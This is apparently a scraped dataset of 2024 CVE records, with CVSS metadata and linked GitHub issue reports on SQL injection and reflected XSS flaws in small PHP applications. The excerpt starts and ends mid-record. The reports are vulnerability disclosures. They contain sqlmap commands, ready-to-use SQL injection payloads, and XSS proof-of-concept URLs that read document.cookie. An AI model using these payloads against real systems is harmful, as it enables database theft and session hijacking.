"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/ssiicckk/cve/issues/1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.268765"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.268765"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.357816"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/ssiicckk/cve/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.268765"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.268765"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.357816"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:admerc:gym_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "959641DE-44CC-4870-AEDF-5E73A4BC5687",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/ssiicckk/cve/issues/1 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"ssiicckk",
"cve"
] | # Itsourcecode Gym Management System Project In PHP With Source Code v1.0 manage_user.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Gym Management System Project In PHP With Source Code
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/gym-management-system-project-in-php-with-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ siiiiiick
## Vulnerable File
+ manage_user.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2021/03/Gym-Management-System-Project-in-PHP.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'manage_user.php' file of the 'Gym Management System Project In PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "id" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
<img width="929" alt="1" src="https://github.com/ssiicckk/cve/assets/91513500/5d063b8b-2ce3-426e-9743-42284125cfd6">
## Impact
+ Attackers only need to use registered regular users to exploit this SQL injection vulnerability for unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ Due to insufficient user input validation for the "id" parameter, a serious SQL injection vulnerability was discovered in the login function of the "Gym Management System Project In PHP With Source Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity.
# Vulnerability details and POC
## Vulnerability type:
+ time-based blind
+ boolean-based blind
+ error-based
+ UNION query
## Vulnerability location:
+ 'id' parameter
## Payload:
<img width="929" alt="1" src="https://github.com/ssiicckk/cve/assets/91513500/0e210873-0e7d-4f3b-b74a-337723367d3d">
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -u "192.168.210.199:1221//manage_user.php?id=2&mtype=own" --batch --dbs
```
<img width="526" alt="3" src="https://github.com/ssiicckk/cve/assets/91513500/8f59575a-1c73-4812-b031-eac0da0da2b5">
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Gym Management System Project In PHP With Source Code v1.0 manage_user.php SQL injection | https://api.github.com/repos/ssiicckk/cve/issues/1/comments | 0 | 2024-06-15T08:19:54Z | 2024-06-15T08:19:54Z | https://github.com/ssiicckk/cve/issues/1 | 2,354,643,688 | 1 | 6,080 |
CVE-2024-6042 | 2024-06-17T00:15:09.323 | A vulnerability was found in itsourcecode Real Estate Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file property-detail.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-268766 is the identifier assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/Cormac315/cve/issues/1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.268766"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.268766"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.357851"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/Cormac315/cve/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.268766"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.268766"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.357851"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:angeljudesuarez:real_estate_management_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "89CC775B-6E0F-474F-AE02-7D933814C0ED",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/Cormac315/cve/issues/1 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"Cormac315",
"cve"
] | # Itsourcecode Real Estate Management System Project In PHP v1.0 property-detail.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Real Estate Management System Project In PHP
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/real-estate-management-system-project-in-php-free-download/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ Cormac
## Vulnerable File
+ property-detail.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2021/04/Real-Estate-Management-System-Project-In-PHP-Free-Download-Source-Code.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'property-detail.php' file of the 'Real Estate Management System Project In PHP' project. The reason for this issue is that attackers inject malicious code from the parameter "id" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
<img width="791" alt="1" src="https://github.com/Cormac315/cve/assets/129538275/bf540966-8264-4ebf-905b-4d2b52ed93d1">
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ Due to insufficient user input verification for the "id" parameter, a serious SQL injection vulnerability has been discovered in the property viewing function of the "Real Estate Management System Project in PHP". Attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity.
# No login or authorization is required to exploit this vulnerability
# Vulnerability details and POC
## Vulnerability type:
+ time-based blind
+ boolean-based blind
+ UNION query
+ error-based
## Vulnerability location:
+ 'id' parameter
## Payload:
```
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4821=4821 AND 'FQYX'='FQYX
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 7545 FROM(SELECT COUNT(*),CONCAT(0x716a6b7a71,(SELECT (ELT(7545=7545,1))),0x7176626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'RXQu'='RXQu
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 6805 FROM (SELECT(SLEEP(5)))ThjU) AND 'KdMQ'='KdMQ
Type: UNION query
Title: Generic UNION query (NULL) - 21 columns
Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x716a6b7a71,0x426a7571504a64794848634c78575652497a6d484678516c59526e44754466777978416d6f55574c,0x7176626b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
```
<img width="394" alt="2" src="https://github.com/Cormac315/cve/assets/129538275/30a2794d-f1a0-4cb8-9cab-4f8f65cbcc97">
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -u "http://192.168.1.138:2223//property-detail.php?id=1" --batch --dbs
```
<img width="362" alt="3" src="https://github.com/Cormac315/cve/assets/129538275/d92248f5-ba8f-4fe6-98ba-5d1a417f90c4">
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Real Estate Management System Project In PHP v1.0 property-detail.php SQL injection | https://api.github.com/repos/Cormac315/cve/issues/1/comments | 0 | 2024-06-15T11:23:56Z | 2024-06-15T11:23:57Z | https://github.com/Cormac315/cve/issues/1 | 2,354,765,014 | 1 | 6,081 |
CVE-2024-37619 | 2024-06-17T14:15:10.943 | StrongShop v1.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the spec_group_id parameter at /spec/index.blade.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 4.7,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "https://github.com/Hebing123/cve/issues/45"
},
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://www.strongshop.cn/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "https://github.com/Hebing123/cve/issues/45"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://www.strongshop.cn/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:strongshop:strongshop:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C00D0882-D77C-4C00-BC4C-D0F94A2649D8",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/Hebing123/cve/issues/45 | [
"Exploit"
] | github.com | [
"Hebing123",
"cve"
] | # Summary
StrongShop v1.0 has a Reflective Cross-Site Scripting (XSS) vulnerability located in the file `resources/views/admin/product/spec/index.blade.php`.
# Details
The vulnerability is located in the script tag. The application does not escape the user-supplied `spec_group_id` parameter before including it in the HTML output, leading to a reflective XSS vulnerability.
```
var spec_group_id = '{!!request('spec_group_id')!!}';
var tableConfig = {
cols: [cols]
,where:{spec_group_id:spec_group_id}
};
Util.renderTable(tableConfig);
}();
</script>
```
# Proof of Concept (PoC)
http://192.168.0.10:1019/admin/product/spec/index?spec_group_id='%3C/script%3E%3Csvg%20onload=alert(1)%3E%3Cscript%3E

| StrongShop v1.0 has a reflected XSS vulnerability | https://api.github.com/repos/Hebing123/cve/issues/45/comments | 1 | 2024-05-30T02:50:20Z | 2024-06-21T02:34:30Z | https://github.com/Hebing123/cve/issues/45 | 2,324,586,619 | 45 | 6,082 |
CVE-2024-37624 | 2024-06-17T14:15:11.680 | Xinhu RockOA v2.6.3 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the /chajian/inputChajian.php. component. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Technical Description"
],
"url": "https://github.com/rainrocka/xinhu/issues/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Technical Description"
],
"url": "https://github.com/rainrocka/xinhu/issues/6"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:rockoa:xinhu:2.6.3:*:*:*:*:*:*:*",
"matchCriteriaId": "D6357A91-F746-425E-91F6-6AEFD6F1C66C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/rainrocka/xinhu/issues/6 | [
"Exploit",
"Technical Description"
] | github.com | [
"rainrocka",
"xinhu"
] | # Summary
A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in the Xinhu RockOA v2.6.3.
# Details
The XSS vulnerability originates from `/include/chajian/inputChajian.php`:
https://github.com/rainrocka/xinhu/blob/7a6debc029c7332756cc3cc75c7faba69639eb89/include/chajian/inputChajian.php#L100
https://github.com/rainrocka/xinhu/blob/7a6debc029c7332756cc3cc75c7faba69639eb89/include/chajian/inputChajian.php#L271-L296
https://github.com/rainrocka/xinhu/blob/7a6debc029c7332756cc3cc75c7faba69639eb89/include/chajian/inputChajian.php#L129-L142
https://github.com/rainrocka/xinhu/blob/7a6debc029c7332756cc3cc75c7faba69639eb89/webmain/flow/page/input_bookborrow.html#L1
An interesting aspect of this vulnerability is that it cannot be identified using conventional Static Application Security Testing (SAST) methods. This is due to the developers' approach of enhancing code flexibility and streamlined management by utilizing `$arr` and `$oarr` to collect and process multiple parameters or options. Consequently, extracting complete parameters and their values becomes challenging, as they might not be present within this php script.
Hence, this highlights the necessity of Dynamic Application Security Testing (DAST).
Upon analysis, we have determined that the controllable parameters at present include: `def_bookid`,`def_bookname`, `def_yjdt`, `def_jydt` and `def_explain`. Notably, each of these parameters is susceptible to XSS vulnerabilities.
# Proof of Concept (PoC)
`http(s)://ip:port/?a=lu&m=input&d=flow&num=bookborrow&mid=4&callback=callback1717123079671_4144&def_modenum=1&def_mid=200&def_explain=%3C/textarea%3E%3Csvg/onload=alert(document.cookie)%3E`
`http(s)://ip:port/?a=lu&m=input&d=flow&num=bookborrow&mid=4&callback=callback1717123079671_4144&def_modenum=1&def_mid=200&def_bookname=%22%3E%3Csvg/onload=alert(document.cookie)%3E`
`http(s)://ip:port/?a=lu&m=input&d=flow&num=bookborrow&mid=4&callback=callback1717123079671_4144&def_modenum=1&def_mid=200&def_yjdt=%22%3E%3Csvg/onload=alert(document.cookie)%3E`
`http(s)://ip:port/?a=lu&m=input&d=flow&num=bookborrow&mid=4&callback=callback1717123079671_4144&def_modenum=1&def_mid=200&def_jydt=%22%3E%3Csvg/onload=alert(document.cookie)%3E`
`http(s)://ip:port/?a=lu&m=input&d=flow&num=bookborrow&mid=4&callback=callback1717123079671_4144&def_modenum=1&def_mid=200&def_bookid=%22%3E%3Csvg/onload=alert(document.cookie)%3E`
 | Reflected XSS Vulnerability in Xinhu RockOA v2.6.3 | https://api.github.com/repos/rainrocka/xinhu/issues/6/comments | 0 | 2024-05-31T07:18:27Z | 2024-05-31T07:43:01Z | https://github.com/rainrocka/xinhu/issues/6 | 2,327,130,572 | 6 | 6,083 |
CVE-2024-37625 | 2024-06-17T14:15:11.790 | zhimengzhe iBarn v1.5 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the $search parameter at /index.php. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Product"
],
"url": "https://github.com/zhimengzhe/iBarn"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Technical Description"
],
"url": "https://github.com/zhimengzhe/iBarn/issues/20"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://github.com/zhimengzhe/iBarn"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Technical Description"
],
"url": "https://github.com/zhimengzhe/iBarn/issues/20"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:zhimengzhel:ibarn:1.5:*:*:*:*:*:*:*",
"matchCriteriaId": "B3DA9D8B-BD04-47E5-8D46-78B2F6EBC874",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/zhimengzhe/iBarn/issues/20 | [
"Exploit",
"Technical Description"
] | github.com | [
"zhimengzhe",
"iBarn"
] | # Summary
A reflected Cross Site Scripting (XSS) vulnerability exists in iBarn v1.5 due to improper sanitization of the `$search` parameter in the `html/index.php`, `html/pay.php`, and `html/own.php` files. Although the `htmlspecialchars` function is used to encode HTML entities, the developers utilized the flag `ENT_NOQUOTES`, which does not encode single or double quotes, leading to the vulnerability.
# Details
The misuse of the htmlspecialchars function allows the injection of JavaScript code into the search field, which can be exploited for XSS attacks.
html/index.php:
```
<input type="text" class="form-control" id="search" name="search" value="<?php echo htmlspecialchars($_REQUEST['search'], ENT_NOQUOTES); ?>" placeholder="<?php echo t('搜你想要'); ?>">
```
html/pay.php:
```
<input type="text" class="form-control" id="search" name="search" value="<?php echo htmlspecialchars($_REQUEST['search'], ENT_NOQUOTES); ?>" placeholder="搜你想要">
```
html/own.php:
```
<input type="text" class="form-control" id="search" name="search" value="<?php echo htmlspecialchars($_REQUEST['search'], ENT_NOQUOTES); ?>" placeholder="<?php echo t('搜你想要'); ?>">
```
# Proof of Concept (PoC)
```
http(s)://ip:port/index.php?search=1%22%20onmouseover=alert(document.cookie)%20bad=%221
```

# Differentiation from CVE-2024-26471
This vulnerability is distinct from CVE-2024-26471 as it specifically targets the $search parameter processed through the htmlspecialchars function and then bypasses filtering.
Although CVE-2024-26471 only mentioned that the search field in `html/offer.php` lacks any filtering, our investigation revealed that several other pages (`shareme.php`, `recycle.php`, `collection.php`, `pub.php`, `myshare.php`) also do not filter the `$search` parameter, leading to multiple cross-site scripting (XSS) vulnerabilities.
| iBarn v1.5 has a reflected XSS vulnerability | https://api.github.com/repos/zhimengzhe/iBarn/issues/20/comments | 0 | 2024-06-03T10:35:48Z | 2024-06-03T10:35:48Z | https://github.com/zhimengzhe/iBarn/issues/20 | 2,330,789,142 | 20 | 6,084 |
CVE-2024-6061 | 2024-06-17T20:15:14.850 | A vulnerability has been found in GPAC 2.5-DEV-rev228-g11067ea92-master and classified as problematic. Affected by this vulnerability is the function isoffin_process of the file src/filters/isoffin_read.c of the component MP4Box. The manipulation leads to infinite loop. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The identifier of the patch is 20c0f29139a82779b86453ce7f68d0681ec7624c. It is recommended to apply a patch to fix this issue. The identifier VDB-268789 was assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 1.7,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.1,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 3.3,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 1.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "LOCAL",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
